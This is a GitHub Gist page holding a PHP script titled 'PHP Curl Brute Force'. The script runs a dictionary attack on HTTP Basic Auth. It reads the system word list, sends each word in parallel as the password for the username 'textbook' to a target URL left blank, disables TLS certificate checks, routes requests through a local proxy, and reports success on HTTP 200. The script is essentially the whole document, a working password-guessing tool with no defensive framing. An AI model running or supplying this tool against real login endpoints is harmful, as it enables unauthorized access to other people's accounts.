Skip to content

Instantly share code, notes, and snippets.

@aizatto
Created September 18, 2011 09:58
Show Gist options
  • Save aizatto/1224935 to your computer and use it in GitHub Desktop.
Save aizatto/1224935 to your computer and use it in GitHub Desktop.
PHP Curl Brute Force
<?php
$url = ""; // fill this up
$file = file_get_contents('/usr/share/dict/words');
$words = explode("\n", $file);
$length = count($words);
$multi = curl_multi_init();
$chunks = array_chunk($words, 100);
$running = null;
$remaining = null;
foreach ($chunks as $i => $chunk) {
$curls = array();
foreach ($chunk as $index => $word) {
$curl = curl_init($url);
$key = (string)$curl;
$curls[$key] = array($word, $index + ($i * 100));
$word = strtolower($word);
curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($curl, CURLOPT_USERPWD, "textbook:$word");
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_HTTP);
curl_setopt($curl, CURLOPT_PROXY, 'localhost');
curl_setopt($curl, CURLOPT_PROXYPORT, 8888);
curl_multi_add_handle($multi, $curl);
do {
$code = curl_multi_exec($multi, $running);
} while ($code === CURLM_CALL_MULTI_PERFORM);
}
while ($running &&
($code === CURLM_OK || $code == CURLM_CALL_MULTI_PERFORM)) {
if (curl_multi_select($multi) == -1) {
continue;
}
do {
$code = curl_multi_exec($multi, $running);
} while ($code == CURLM_CALL_MULTI_PERFORM);
}
do {
$message = curl_multi_info_read($multi, $remaining);
if (!$message) {
continue;
}
$curl = $message['handle'];
$key = (string)$curl;
$word = $curls[$key][0];
$index = $curls[$key][1];
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
echo "$index/$length $status $word \n";
if ($status == 200) {
echo "WINNER: ".$curls[$key]."\n";
exit();
}
curl_multi_remove_handle($multi, $curl);
curl_close($curl);
} while ($remaining != 0);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment